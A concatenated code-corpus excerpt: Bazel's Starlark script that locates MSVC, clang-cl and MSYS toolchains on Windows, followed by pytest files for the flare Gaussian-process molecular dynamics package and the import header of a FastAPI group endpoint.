"auto_configure_warning",
"auto_configure_warning_maybe",
"escape_string",
"execute",
"resolve_labels",
"write_builtin_include_directory_paths",
)
def _get_path_env_var(repository_ctx, name):
"""Returns a path from an environment variable.
Removes quotes, replaces '/' with '\', and strips trailing '\'s."""
if name in repository_ctx.os.environ:
value = repository_ctx.os.environ[name]
if value[0] == "\"":
if len(value) == 1 or value[-1] != "\"":
auto_configure_fail("'%s' environment variable has no trailing quote" % name)
value = value[1:-1]
if "/" in value:
value = value.replace("/", "\\")
if value[-1] == "\\":
value = value.rstrip("\\")
return value
else:
return None
def _get_temp_env(repository_ctx):
"""Returns the value of TMP, or TEMP, or if both undefined then C:\\Windows."""
tmp = _get_path_env_var(repository_ctx, "TMP")
if not tmp:
tmp = _get_path_env_var(repository_ctx, "TEMP")
if not tmp:
tmp = "C:\\Windows\\Temp"
auto_configure_warning(
"neither 'TMP' nor 'TEMP' environment variables are set, using '%s' as default" % tmp,
)
return tmp
def _get_escaped_windows_msys_starlark_content(repository_ctx, use_mingw = False):
"""Return the content of msys cc toolchain rule."""
msys_root = ""
bazel_sh = _get_path_env_var(repository_ctx, "BAZEL_SH")
if bazel_sh:
bazel_sh = bazel_sh.replace("\\", "/").lower()
tokens = bazel_sh.rsplit("/", 1)
if tokens[0].endswith("/usr/bin"):
msys_root = tokens[0][:len(tokens[0]) - len("usr/bin")]
elif tokens[0].endswith("/bin"):
msys_root = tokens[0][:len(tokens[0]) - len("bin")]
prefix = "mingw64" if use_mingw else "usr"
tool_path_prefix = escape_string(msys_root) + prefix
tool_bin_path = tool_path_prefix + "/bin"
tool_path = {}
for tool in ["ar", "compat-ld", "cpp", "dwp", "gcc", "gcov", "ld", "nm", "objcopy", "objdump", "strip"]:
if msys_root:
tool_path[tool] = tool_bin_path + "/" + tool
else:
tool_path[tool] = "msys_gcc_installation_error.bat"
tool_paths = ",\n ".join(['"%s": "%s"' % (k, v) for k, v in tool_path.items()])
include_directories = (' "%s/",\n ' % tool_path_prefix) if msys_root else ""
return tool_paths, tool_bin_path, include_directories
def _get_system_root(repository_ctx):
"""Get System root path on Windows, default is C:\\Windows. Doesn't %-escape the result."""
systemroot = _get_path_env_var(repository_ctx, "SYSTEMROOT")
if not systemroot:
systemroot = "C:\\Windows"
auto_configure_warning_maybe(
repository_ctx,
"SYSTEMROOT is not set, using default SYSTEMROOT=C:\\Windows",
)
return escape_string(systemroot)
def _add_system_root(repository_ctx, env):
"""Running VCVARSALL.BAT and VCVARSQUERYREGISTRY.BAT need %SYSTEMROOT%\\\\system32 in PATH."""
if "PATH" not in env:
env["PATH"] = ""
env["PATH"] = env["PATH"] + ";" + _get_system_root(repository_ctx) + "\\system32"
return env
def find_vc_path(repository_ctx):
"""Find Visual C++ build tools install path. Doesn't %-escape the result."""
# 1. Check if BAZEL_VC or BAZEL_VS is already set by user.
bazel_vc = _get_path_env_var(repository_ctx, "BAZEL_VC")
if bazel_vc:
if repository_ctx.path(bazel_vc).exists:
return bazel_vc
else:
auto_configure_warning_maybe(
repository_ctx,
"%BAZEL_VC% is set to non-existent path, ignoring.",
)
bazel_vs = _get_path_env_var(repository_ctx, "BAZEL_VS")
if bazel_vs:
if repository_ctx.path(bazel_vs).exists:
bazel_vc = bazel_vs + "\\VC"
if repository_ctx.path(bazel_vc).exists:
return bazel_vc
else:
auto_configure_warning_maybe(
repository_ctx,
"No 'VC' directory found under %BAZEL_VS%, ignoring.",
)
else:
auto_configure_warning_maybe(
repository_ctx,
"%BAZEL_VS% is set to non-existent path, ignoring.",
)
auto_configure_warning_maybe(
repository_ctx,
"Neither %BAZEL_VC% nor %BAZEL_VS% are set, start looking for the latest Visual C++" +
" installed.",
)
# 2. Check if VS%VS_VERSION%COMNTOOLS is set, if true then try to find and use
# vcvarsqueryregistry.bat / VsDevCmd.bat to detect VC++.
auto_configure_warning_maybe(repository_ctx, "Looking for VS%VERSION%COMNTOOLS environment variables, " +
"eg. VS140COMNTOOLS")
for vscommontools_env, script in [
("VS160COMNTOOLS", "VsDevCmd.bat"),
("VS150COMNTOOLS", "VsDevCmd.bat"),
("VS140COMNTOOLS", "vcvarsqueryregistry.bat"),
("VS120COMNTOOLS", "vcvarsqueryregistry.bat"),
("VS110COMNTOOLS", "vcvarsqueryregistry.bat"),
("VS100COMNTOOLS", "vcvarsqueryregistry.bat"),
("VS90COMNTOOLS", "vcvarsqueryregistry.bat"),
]:
if vscommontools_env not in repository_ctx.os.environ:
continue
script = _get_path_env_var(repository_ctx, vscommontools_env) + "\\" + script
if not repository_ctx.path(script).exists:
continue
repository_ctx.file(
"get_vc_dir.bat",
"@echo off\n" +
"call \"" + script + "\" > NUL\n" +
"echo %VCINSTALLDIR%",
True,
)
env = _add_system_root(repository_ctx, repository_ctx.os.environ)
vc_dir = execute(repository_ctx, ["./get_vc_dir.bat"], environment = env)
auto_configure_warning_maybe(repository_ctx, "Visual C++ build tools found at %s" % vc_dir)
return vc_dir
# 3. User might have purged all environment variables. If so, look for Visual C++ in registry.
# Works for Visual Studio 2017 and older. (Does not work for Visual Studio 2019 Preview.)
# TODO(laszlocsomor): check if "16.0" also has this registry key, after VS 2019 is released.
auto_configure_warning_maybe(repository_ctx, "Looking for Visual C++ through registry")
reg_binary = _get_system_root(repository_ctx) + "\\system32\\reg.exe"
vc_dir = None
for key, suffix in (("VC7", ""), ("VS7", "\\VC")):
for version in ["15.0", "14.0", "12.0", "11.0", "10.0", "9.0", "8.0"]:
if vc_dir:
break
result = repository_ctx.execute([reg_binary, "query", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\VisualStudio\\SxS\\" + key, "/v", version])
auto_configure_warning_maybe(repository_ctx, "registry query result for VC %s:\n\nSTDOUT(start)\n%s\nSTDOUT(end)\nSTDERR(start):\n%s\nSTDERR(end)\n" %
(version, result.stdout, result.stderr))
if not result.stderr:
for line in result.stdout.split("\n"):
line = line.strip()
if line.startswith(version) and line.find("REG_SZ") != -1:
vc_dir = line[line.find("REG_SZ") + len("REG_SZ"):].strip() + suffix
if vc_dir:
auto_configure_warning_maybe(repository_ctx, "Visual C++ build tools found at %s" % vc_dir)
return vc_dir
# 4. Check default directories for VC installation
auto_configure_warning_maybe(repository_ctx, "Looking for default Visual C++ installation directory")
program_files_dir = _get_path_env_var(repository_ctx, "PROGRAMFILES(X86)")
if not program_files_dir:
program_files_dir = "C:\\Program Files (x86)"
auto_configure_warning_maybe(
repository_ctx,
"'PROGRAMFILES(X86)' environment variable is not set, using '%s' as default" % program_files_dir,
)
for path in [
"Microsoft Visual Studio\\2019\\Preview\\VC",
"Microsoft Visual Studio\\2019\\BuildTools\\VC",
"Microsoft Visual Studio\\2019\\Community\\VC",
"Microsoft Visual Studio\\2019\\Professional\\VC",
"Microsoft Visual Studio\\2019\\Enterprise\\VC",
"Microsoft Visual Studio\\2017\\BuildTools\\VC",
"Microsoft Visual Studio\\2017\\Community\\VC",
"Microsoft Visual Studio\\2017\\Professional\\VC",
"Microsoft Visual Studio\\2017\\Enterprise\\VC",
"Microsoft Visual Studio 14.0\\VC",
]:
path = program_files_dir + "\\" + path
if repository_ctx.path(path).exists:
vc_dir = path
break
if not vc_dir:
auto_configure_warning_maybe(repository_ctx, "Visual C++ build tools not found.")
return None
auto_configure_warning_maybe(repository_ctx, "Visual C++ build tools found at %s" % vc_dir)
return vc_dir
def _is_vs_2017_or_2019(vc_path):
"""Check if the installed VS version is Visual Studio 2017."""
# In VS 2017 and 2019, the location of VC is like:
# C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\VC\
# In VS 2015 or older version, it is like:
# C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\
return vc_path.find("2017") != -1 or vc_path.find("2019") != -1
def _find_vcvars_bat_script(repository_ctx, vc_path):
"""Find batch script to set up environment variables for VC. Doesn't %-escape the result."""
if _is_vs_2017_or_2019(vc_path):
vcvars_script = vc_path + "\\Auxiliary\\Build\\VCVARSALL.BAT"
else:
vcvars_script = vc_path + "\\VCVARSALL.BAT"
if not repository_ctx.path(vcvars_script).exists:
return None
return vcvars_script
def _is_support_vcvars_ver(vc_full_version):
"""-vcvars_ver option is supported from version 14.11.25503 (VS 2017 version 15.3)."""
version = [int(i) for i in vc_full_version.split(".")]
min_version = [14, 11, 25503]
return version >= min_version
def _is_support_winsdk_selection(repository_ctx, vc_path):
"""Windows SDK selection is supported with VC 2017 / 2019 or with full VS 2015 installation."""
if _is_vs_2017_or_2019(vc_path):
return True
# By checking the source code of VCVARSALL.BAT in VC 2015, we know that
# when devenv.exe or wdexpress.exe exists, VCVARSALL.BAT supports Windows SDK selection.
vc_common_ide = repository_ctx.path(vc_path).dirname.get_child("Common7").get_child("IDE")
for tool in ["devenv.exe", "wdexpress.exe"]:
if vc_common_ide.get_child(tool).exists:
return True
return False
def setup_vc_env_vars(repository_ctx, vc_path, envvars = [], allow_empty = False, escape = True):
"""Get environment variables set by VCVARSALL.BAT script. Doesn't %-escape the result!
Args:
repository_ctx: the repository_ctx object
vc_path: Visual C++ root directory
envvars: list of envvars to retrieve; default is ["PATH", "INCLUDE", "LIB", "WINDOWSSDKDIR"]
allow_empty: allow unset envvars; if False then report errors for those
escape: if True, escape "\" as "\\" and "%" as "%%" in the envvar values
Returns:
dictionary of the envvars
"""
if not envvars:
envvars = ["PATH", "INCLUDE", "LIB", "WINDOWSSDKDIR"]
vcvars_script = _find_vcvars_bat_script(repository_ctx, vc_path)
if not vcvars_script:
auto_configure_fail("Cannot find VCVARSALL.BAT script under %s" % vc_path)
# Getting Windows SDK version set by user.
# Only supports VC 2017 & 2019 and VC 2015 with full VS installation.
winsdk_version = _get_winsdk_full_version(repository_ctx)
if winsdk_version and not _is_support_winsdk_selection(repository_ctx, vc_path):
auto_configure_warning(("BAZEL_WINSDK_FULL_VERSION=%s is ignored, " +
"because standalone Visual C++ Build Tools 2015 doesn't support specifying Windows " +
"SDK version, please install the full VS 2015 or use VC 2017/2019.") % winsdk_version)
winsdk_version = ""
# Get VC version set by user. Only supports VC 2017 & 2019.
vcvars_ver = ""
if _is_vs_2017_or_2019(vc_path):
full_version = _get_vc_full_version(repository_ctx, vc_path)
# Because VCVARSALL.BAT is from the latest VC installed, so we check if the latest
# version supports -vcvars_ver or not.
if _is_support_vcvars_ver(_get_latest_subversion(repository_ctx, vc_path)):
vcvars_ver = "-vcvars_ver=" + full_version
cmd = "\"%s\" amd64 %s %s" % (vcvars_script, winsdk_version, vcvars_ver)
print_envvars = ",".join(["{k}=%{k}%".format(k = k) for k in envvars])
repository_ctx.file(
"get_env.bat",
"@echo off\n" +
("call %s > NUL \n" % cmd) + ("echo %s \n" % print_envvars),
True,
)
env = _add_system_root(repository_ctx, {k: "" for k in envvars})
envs = execute(repository_ctx, ["./get_env.bat"], environment = env).split(",")
env_map = {}
for env in envs:
key, value = env.split("=", 1)
env_map[key] = escape_string(value.replace("\\", "\\\\")) if escape else value
if not allow_empty:
_check_env_vars(env_map, cmd, expected = envvars)
return env_map
def _check_env_vars(env_map, cmd, expected):
for env in expected:
if not env_map.get(env):
auto_configure_fail(
"Setting up VC environment variables failed, %s is not set by the following command:\n %s" % (env, cmd),
)
def _get_latest_subversion(repository_ctx, vc_path):
"""Get the latest subversion of a VS 2017/2019 installation.
For VS 2017 & 2019, there could be multiple versions of VC build tools.
The directories are like:
<vc_path>\\Tools\\MSVC\\14.10.24930\\bin\\HostX64\\x64
<vc_path>\\Tools\\MSVC\\14.16.27023\\bin\\HostX64\\x64
This function should return 14.16.27023 in this case."""
versions = [path.basename for path in repository_ctx.path(vc_path + "\\Tools\\MSVC").readdir()]
if len(versions) < 1:
auto_configure_warning_maybe(repository_ctx, "Cannot find any VC installation under BAZEL_VC(%s)" % vc_path)
return None
# Parse the version string into integers, then sort the integers to prevent textual sorting.
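    # For example, given the hypothetical versions 14.9.25017, 14.10.24930 and 14.16.27023,
    # a textual sort would pick 14.9.25017 as the "latest", whereas sorting the parsed
    # integer lists correctly selects 14.16.27023.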
version_list = []
for version in versions:
parts = [int(i) for i in version.split(".")]
version_list.append((parts, version))
version_list = sorted(version_list)
latest_version = version_list[-1][1]
    auto_configure_warning_maybe(repository_ctx, "Found the following VC versions:\n%s\n\nChoosing the latest version = %s" % ("\n".join(versions), latest_version))
return latest_version
def _get_vc_full_version(repository_ctx, vc_path):
"""Return the value of BAZEL_VC_FULL_VERSION if defined, otherwise the latest version."""
if "BAZEL_VC_FULL_VERSION" in repository_ctx.os.environ:
return repository_ctx.os.environ["BAZEL_VC_FULL_VERSION"]
return _get_latest_subversion(repository_ctx, vc_path)
def _get_winsdk_full_version(repository_ctx):
"""Return the value of BAZEL_WINSDK_FULL_VERSION if defined, otherwise an empty string."""
return repository_ctx.os.environ.get("BAZEL_WINSDK_FULL_VERSION", default = "")
def find_msvc_tool(repository_ctx, vc_path, tool):
"""Find the exact path of a specific build tool in MSVC. Doesn't %-escape the result."""
tool_path = None
if _is_vs_2017_or_2019(vc_path):
full_version = _get_vc_full_version(repository_ctx, vc_path)
if full_version:
tool_path = "%s\\Tools\\MSVC\\%s\\bin\\HostX64\\x64\\%s" % (vc_path, full_version, tool)
else:
        # For VS 2015 and older versions, the tools are under:
# C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\amd64
tool_path = vc_path + "\\bin\\amd64\\" + tool
if not tool_path or not repository_ctx.path(tool_path).exists:
return None
return tool_path.replace("\\", "/")
def _find_missing_vc_tools(repository_ctx, vc_path):
"""Check if any required tool is missing under given VC path."""
missing_tools = []
if not _find_vcvars_bat_script(repository_ctx, vc_path):
missing_tools.append("VCVARSALL.BAT")
for tool in ["cl.exe", "link.exe", "lib.exe", "ml64.exe"]:
if not find_msvc_tool(repository_ctx, vc_path, tool):
missing_tools.append(tool)
return missing_tools
def _is_support_debug_fastlink(repository_ctx, linker):
"""Run linker alone to see if it supports /DEBUG:FASTLINK."""
if _use_clang_cl(repository_ctx):
# LLVM's lld-link.exe doesn't support /DEBUG:FASTLINK.
return False
result = execute(repository_ctx, [linker], expect_failure = True)
return result.find("/DEBUG[:{FASTLINK|FULL|NONE}]") != -1
def find_llvm_path(repository_ctx):
"""Find LLVM install path."""
# 1. Check if BAZEL_LLVM is already set by user.
bazel_llvm = _get_path_env_var(repository_ctx, "BAZEL_LLVM")
if bazel_llvm:
return bazel_llvm
auto_configure_warning_maybe(repository_ctx, "'BAZEL_LLVM' is not set, " +
"start looking for LLVM installation on machine.")
# 2. Look for LLVM installation through registry.
auto_configure_warning_maybe(repository_ctx, "Looking for LLVM installation through registry")
reg_binary = _get_system_root(repository_ctx) + "\\system32\\reg.exe"
llvm_dir = None
result = repository_ctx.execute([reg_binary, "query", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\LLVM\\LLVM"])
auto_configure_warning_maybe(repository_ctx, "registry query result for LLVM:\n\nSTDOUT(start)\n%s\nSTDOUT(end)\nSTDERR(start):\n%s\nSTDERR(end)\n" %
(result.stdout, result.stderr))
if not result.stderr:
for line in result.stdout.split("\n"):
line = line.strip()
if line.startswith("(Default)") and line.find("REG_SZ") != -1:
llvm_dir = line[line.find("REG_SZ") + len("REG_SZ"):].strip()
if llvm_dir:
auto_configure_warning_maybe(repository_ctx, "LLVM installation found at %s" % llvm_dir)
return llvm_dir
# 3. Check default directories for LLVM installation
auto_configure_warning_maybe(repository_ctx, "Looking for default LLVM installation directory")
program_files_dir = _get_path_env_var(repository_ctx, "PROGRAMFILES")
if not program_files_dir:
program_files_dir = "C:\\Program Files"
auto_configure_warning_maybe(
repository_ctx,
"'PROGRAMFILES' environment variable is not set, using '%s' as default" % program_files_dir,
)
path = program_files_dir + "\\LLVM"
if repository_ctx.path(path).exists:
llvm_dir = path
if not llvm_dir:
auto_configure_warning_maybe(repository_ctx, "LLVM installation not found.")
return None
auto_configure_warning_maybe(repository_ctx, "LLVM installation found at %s" % llvm_dir)
return llvm_dir
def find_llvm_tool(repository_ctx, llvm_path, tool):
"""Find the exact path of a specific build tool in LLVM. Doesn't %-escape the result."""
tool_path = llvm_path + "\\bin\\" + tool
if not repository_ctx.path(tool_path).exists:
return None
return tool_path.replace("\\", "/")
def _use_clang_cl(repository_ctx):
"""Returns True if USE_CLANG_CL is set to 1."""
return repository_ctx.os.environ.get("USE_CLANG_CL", default = "0") == "1"
def _find_missing_llvm_tools(repository_ctx, llvm_path):
"""Check if any required tool is missing under given LLVM path."""
missing_tools = []
for tool in ["clang-cl.exe", "lld-link.exe", "llvm-lib.exe"]:
if not find_llvm_tool(repository_ctx, llvm_path, tool):
missing_tools.append(tool)
return missing_tools
def _get_clang_version(repository_ctx, clang_cl):
result = repository_ctx.execute([clang_cl, "-v"])
if result.return_code != 0:
auto_configure_fail("Failed to get clang version by running \"%s -v\"" % clang_cl)
# Stderr should look like "clang version X.X.X ..."
return result.stderr.strip().split(" ")[2]
def _get_msys_mingw_vars(repository_ctx):
"""Get the variables we need to populate the msys/mingw toolchains."""
tool_paths, tool_bin_path, inc_dir_msys = _get_escaped_windows_msys_starlark_content(repository_ctx)
tool_paths_mingw, tool_bin_path_mingw, inc_dir_mingw = _get_escaped_windows_msys_starlark_content(repository_ctx, use_mingw = True)
write_builtin_include_directory_paths(repository_ctx, "mingw", [inc_dir_mingw], file_suffix = "_mingw")
msys_mingw_vars = {
"%{cxx_builtin_include_directories}": inc_dir_msys,
"%{mingw_cxx_builtin_include_directories}": inc_dir_mingw,
"%{tool_paths}": tool_paths,
"%{mingw_tool_paths}": tool_paths_mingw,
"%{tool_bin_path}": tool_bin_path,
"%{mingw_tool_bin_path}": tool_bin_path_mingw,
}
return msys_mingw_vars
def _get_msvc_vars(repository_ctx, paths):
"""Get the variables we need to populate the MSVC toolchains."""
msvc_vars = dict()
vc_path = find_vc_path(repository_ctx)
missing_tools = None
if not vc_path:
repository_ctx.template(
"vc_installation_error.bat",
paths["@bazel_tools//tools/cpp:vc_installation_error.bat.tpl"],
{"%{vc_error_message}": ""},
)
else:
missing_tools = _find_missing_vc_tools(repository_ctx, vc_path)
if missing_tools:
message = "\r\n".join([
"echo. 1>&2",
"echo Visual C++ build tools seems to be installed at %s 1>&2" % vc_path,
"echo But Bazel can't find the following tools: 1>&2",
"echo %s 1>&2" % ", ".join(missing_tools),
"echo. 1>&2",
])
repository_ctx.template(
"vc_installation_error.bat",
paths["@bazel_tools//tools/cpp:vc_installation_error.bat.tpl"],
{"%{vc_error_message}": message},
)
if not vc_path or missing_tools:
write_builtin_include_directory_paths(repository_ctx, "msvc", [], file_suffix = "_msvc")
msvc_vars = {
"%{msvc_env_tmp}": "msvc_not_found",
"%{msvc_env_path}": "msvc_not_found",
"%{msvc_env_include}": "msvc_not_found",
"%{msvc_env_lib}": "msvc_not_found",
"%{msvc_cl_path}": "vc_installation_error.bat",
"%{msvc_ml_path}": "vc_installation_error.bat",
"%{msvc_link_path}": "vc_installation_error.bat",
"%{msvc_lib_path}": "vc_installation_error.bat",
"%{dbg_mode_debug_flag}": "/DEBUG",
"%{fastbuild_mode_debug_flag}": "/DEBUG",
"%{msvc_cxx_builtin_include_directories}": "",
}
return msvc_vars
env = setup_vc_env_vars(repository_ctx, vc_path)
escaped_paths = escape_string(env["PATH"])
escaped_include_paths = escape_string(env["INCLUDE"])
escaped_lib_paths = escape_string(env["LIB"])
escaped_tmp_dir = escape_string(_get_temp_env(repository_ctx).replace("\\", "\\\\"))
llvm_path = ""
if _use_clang_cl(repository_ctx):
llvm_path = find_llvm_path(repository_ctx)
if not llvm_path:
auto_configure_fail("\nUSE_CLANG_CL is set to 1, but Bazel cannot find Clang installation on your system.\n" +
"Please install Clang via http://releases.llvm.org/download.html\n")
cl_path = find_llvm_tool(repository_ctx, llvm_path, "clang-cl.exe")
link_path = find_llvm_tool(repository_ctx, llvm_path, "lld-link.exe")
if not link_path:
link_path = find_msvc_tool(repository_ctx, vc_path, "link.exe")
lib_path = find_llvm_tool(repository_ctx, llvm_path, "llvm-lib.exe")
if not lib_path:
lib_path = find_msvc_tool(repository_ctx, vc_path, "lib.exe")
else:
cl_path = find_msvc_tool(repository_ctx, vc_path, "cl.exe")
link_path = find_msvc_tool(repository_ctx, vc_path, "link.exe")
lib_path = find_msvc_tool(repository_ctx, vc_path, "lib.exe")
msvc_ml_path = find_msvc_tool(repository_ctx, vc_path, "ml64.exe")
escaped_cxx_include_directories = []
for path in escaped_include_paths.split(";"):
if path:
escaped_cxx_include_directories.append("\"%s\"" % path)
if llvm_path:
clang_version = _get_clang_version(repository_ctx, cl_path)
clang_dir = llvm_path + "\\lib\\clang\\" + clang_version
clang_include_path = (clang_dir + "\\include").replace("\\", "\\\\")
escaped_cxx_include_directories.append("\"%s\"" % clang_include_path)
clang_lib_path = (clang_dir + "\\lib\\windows").replace("\\", "\\\\")
escaped_lib_paths = escaped_lib_paths + ";" + clang_lib_path
support_debug_fastlink = _is_support_debug_fastlink(repository_ctx, link_path)
write_builtin_include_directory_paths(repository_ctx, "msvc", escaped_cxx_include_directories, file_suffix = "_msvc")
msvc_vars = {
"%{msvc_env_tmp}": escaped_tmp_dir,
"%{msvc_env_path}": escaped_paths,
"%{msvc_env_include}": escaped_include_paths,
"%{msvc_env_lib}": escaped_lib_paths,
"%{msvc_cl_path}": cl_path,
"%{msvc_ml_path}": msvc_ml_path,
"%{msvc_link_path}": link_path,
"%{msvc_lib_path}": lib_path,
"%{dbg_mode_debug_flag}": "/DEBUG:FULL" if support_debug_fastlink else "/DEBUG",
"%{fastbuild_mode_debug_flag}": "/DEBUG:FASTLINK" if support_debug_fastlink else "/DEBUG",
"%{msvc_cxx_builtin_include_directories}": " " + ",\n ".join(escaped_cxx_include_directories),
}
return msvc_vars
def _get_clang_cl_vars(repository_ctx, paths, msvc_vars):
"""Get the variables we need to populate the clang-cl toolchains."""
llvm_path = find_llvm_path(repository_ctx)
error_script = None
if msvc_vars["%{msvc_cl_path}"] == "vc_installation_error.bat":
error_script = "vc_installation_error.bat"
elif not llvm_path:
repository_ctx.template(
"clang_installation_error.bat",
paths["@bazel_tools//tools/cpp:clang_installation_error.bat.tpl"],
{"%{clang_error_message}": ""},
)
error_script = "clang_installation_error.bat"
else:
missing_tools = _find_missing_llvm_tools(repository_ctx, llvm_path)
if missing_tools:
message = "\r\n".join([
"echo. 1>&2",
"echo LLVM/Clang seems to be installed at %s 1>&2" % llvm_path,
"echo But Bazel can't find the following tools: 1>&2",
"echo %s 1>&2" % ", ".join(missing_tools),
"echo. 1>&2",
])
repository_ctx.template(
"clang_installation_error.bat",
paths["@bazel_tools//tools/cpp:clang_installation_error.bat.tpl"],
{"%{clang_error_message}": message},
)
error_script = "clang_installation_error.bat"
if error_script:
write_builtin_include_directory_paths(repository_ctx, "clang-cl", [], file_suffix = "_clangcl")
clang_cl_vars = {
"%{clang_cl_env_tmp}": "clang_cl_not_found",
"%{clang_cl_env_path}": "clang_cl_not_found",
"%{clang_cl_env_include}": "clang_cl_not_found",
"%{clang_cl_env_lib}": "clang_cl_not_found",
"%{clang_cl_cl_path}": error_script,
"%{clang_cl_link_path}": error_script,
"%{clang_cl_lib_path}": error_script,
"%{clang_cl_ml_path}": error_script,
"%{clang_cl_dbg_mode_debug_flag}": "/DEBUG",
"%{clang_cl_fastbuild_mode_debug_flag}": "/DEBUG",
"%{clang_cl_cxx_builtin_include_directories}": "",
}
return clang_cl_vars
clang_cl_path = find_llvm_tool(repository_ctx, llvm_path, "clang-cl.exe")
lld_link_path = find_llvm_tool(repository_ctx, llvm_path, "lld-link.exe")
llvm_lib_path = find_llvm_tool(repository_ctx, llvm_path, "llvm-lib.exe")
clang_version = _get_clang_version(repository_ctx, clang_cl_path)
clang_dir = llvm_path + "\\lib\\clang\\" + clang_version
clang_include_path = (clang_dir + "\\include").replace("\\", "\\\\")
clang_lib_path = (clang_dir + "\\lib\\windows").replace("\\", "\\\\")
clang_cl_include_directories = msvc_vars["%{msvc_cxx_builtin_include_directories}"] + (",\n \"%s\"" % clang_include_path)
write_builtin_include_directory_paths(repository_ctx, "clang-cl", [clang_cl_include_directories], file_suffix = "_clangcl")
clang_cl_vars = {
"%{clang_cl_env_tmp}": msvc_vars["%{msvc_env_tmp}"],
"%{clang_cl_env_path}": msvc_vars["%{msvc_env_path}"],
"%{clang_cl_env_include}": msvc_vars["%{msvc_env_include}"] + ";" + clang_include_path,
"%{clang_cl_env_lib}": msvc_vars["%{msvc_env_lib}"] + ";" + clang_lib_path,
"%{clang_cl_cxx_builtin_include_directories}": clang_cl_include_directories,
"%{clang_cl_cl_path}": clang_cl_path,
"%{clang_cl_link_path}": lld_link_path,
"%{clang_cl_lib_path}": llvm_lib_path,
"%{clang_cl_ml_path}": msvc_vars["%{msvc_ml_path}"],
# LLVM's lld-link.exe doesn't support /DEBUG:FASTLINK.
"%{clang_cl_dbg_mode_debug_flag}": "/DEBUG",
"%{clang_cl_fastbuild_mode_debug_flag}": "/DEBUG",
}
return clang_cl_vars
def configure_windows_toolchain(repository_ctx):
"""Configure C++ toolchain on Windows."""
paths = resolve_labels(repository_ctx, [
"@bazel_tools//tools/cpp:BUILD.windows.tpl",
"@bazel_tools//tools/cpp:windows_cc_toolchain_config.bzl",
"@bazel_tools//tools/cpp:armeabi_cc_toolchain_config.bzl",
"@bazel_tools//tools/cpp:vc_installation_error.bat.tpl",
"@bazel_tools//tools/cpp:msys_gcc_installation_error.bat",
"@bazel_tools//tools/cpp:clang_installation_error.bat.tpl",
])
repository_ctx.symlink(
paths["@bazel_tools//tools/cpp:windows_cc_toolchain_config.bzl"],
"windows_cc_toolchain_config.bzl",
)
repository_ctx.symlink(
paths["@bazel_tools//tools/cpp:armeabi_cc_toolchain_config.bzl"],
"armeabi_cc_toolchain_config.bzl",
)
repository_ctx.symlink(
paths["@bazel_tools//tools/cpp:msys_gcc_installation_error.bat"],
"msys_gcc_installation_error.bat",
)
template_vars = dict()
msvc_vars = _get_msvc_vars(repository_ctx, paths)
template_vars.update(msvc_vars)
template_vars.update(_get_clang_cl_vars(repository_ctx, paths, msvc_vars))
template_vars.update(_get_msys_mingw_vars(repository_ctx))
repository_ctx.template(
"BUILD",
paths["@bazel_tools//tools/cpp:BUILD.windows.tpl"],
template_vars,
)
``` |
{
"source": "jonpvandermause/flare",
"score": 2
} |
#### File: flare/tests/test_OTF.py
```python
import pytest
import os
import sys
import numpy as np
from flare.otf import OTF
from flare.gp import GaussianProcess
from flare.struc import Structure
import flare.kernels as en
def cleanup_espresso_run(target: str = None):
os.system('rm pwscf.out')
os.system('rm pwscf.wfc')
os.system('rm -r pwscf.save')
os.system('rm pwscf.in')
os.system('rm pwscf.wfc1')
os.system('rm pwscf.wfc2')
if target:
os.system('rm ' + target)
# ------------------------------------------------------
# test otf runs
# ------------------------------------------------------
def test_otf_h2():
"""
    Test that an OTF run on an H2 system completes without errors.
:return:
"""
os.system('cp ./test_files/qe_input_1.in ./pwscf.in')
qe_input = './pwscf.in'
dt = 0.0001
number_of_steps = 20
cutoffs = np.array([5])
pw_loc = os.environ.get('PWSCF_COMMAND')
std_tolerance_factor = -0.1
# make gp model
kernel = en.two_body
kernel_grad = en.two_body_grad
hyps = np.array([1, 1, 1])
hyp_labels = ['Signal Std', 'Length Scale', 'Noise Std']
energy_force_kernel = en.two_body_force_en
gp = \
GaussianProcess(kernel=kernel,
kernel_grad=kernel_grad,
hyps=hyps,
cutoffs=cutoffs,
hyp_labels=hyp_labels,
energy_force_kernel=energy_force_kernel,
maxiter=50)
otf = OTF(qe_input, dt, number_of_steps, gp, pw_loc,
std_tolerance_factor, init_atoms=[0],
calculate_energy=True, max_atoms_added=1,
output_name='h2_otf.out')
otf.run()
os.system('mkdir test_outputs')
os.system('mv h2_otf.out test_outputs')
cleanup_espresso_run()
def test_otf_al():
"""
    Test that an OTF run on an Al system completes without errors.
:return:
"""
os.system('cp ./test_files/qe_input_2.in ./pwscf.in')
qe_input = './pwscf.in'
dt = 0.001
number_of_steps = 100
cutoffs = np.array([3.9, 3.9])
pw_loc = os.environ.get('PWSCF_COMMAND')
std_tolerance_factor = 1
max_atoms_added = 2
freeze_hyps = 3
# make gp model
kernel = en.three_body
kernel_grad = en.three_body_grad
hyps = np.array([0.1, 1, 0.01])
hyp_labels = ['Signal Std', 'Length Scale', 'Noise Std']
energy_force_kernel = en.three_body_force_en
gp = \
GaussianProcess(kernel=kernel,
kernel_grad=kernel_grad,
hyps=hyps,
cutoffs=cutoffs,
hyp_labels=hyp_labels,
energy_force_kernel=energy_force_kernel,
maxiter=50)
otf = OTF(qe_input, dt, number_of_steps, gp, pw_loc,
std_tolerance_factor, init_atoms=[0],
calculate_energy=True, output_name='al_otf.out',
freeze_hyps=freeze_hyps, skip=5,
max_atoms_added=max_atoms_added)
otf.run()
os.system('mkdir test_outputs')
os.system('mv al_otf.out test_outputs')
cleanup_espresso_run()
```
#### File: flare/tests/test_util.py
```python
from flare.util import element_to_Z
import pytest
def test_element_to_Z():
for i in range(120):
assert element_to_Z(i) == i
for pair in zip(['H', 'C', 'O', 'Og'], [1, 6, 8, 118]):
assert element_to_Z(pair[0]) == pair[1]
def test_elt_warning():
with pytest.warns(Warning):
element_to_Z('Fe2')
``` |
{
"source": "jonra1993/fastapi-alembic-sqlmodel-async",
"score": 2
} |
#### File: api_v1/endpoints/group.py
```python
from app.models.user import User
from app.schemas.common import (
IGetResponseBase,
IPostResponseBase,
IPutResponseBase,
)
from fastapi_pagination import Page, Params
from app.schemas.group import IGroupCreate, IGroupRead, IGroupReadWithUsers, IGroupUpdate
from sqlmodel.ext.asyncio.session import AsyncSession
from fastapi import APIRouter, Depends, HTTPException
from app.api import deps
from app import crud
from uuid import UUID
from app.schemas.role import IRoleEnum
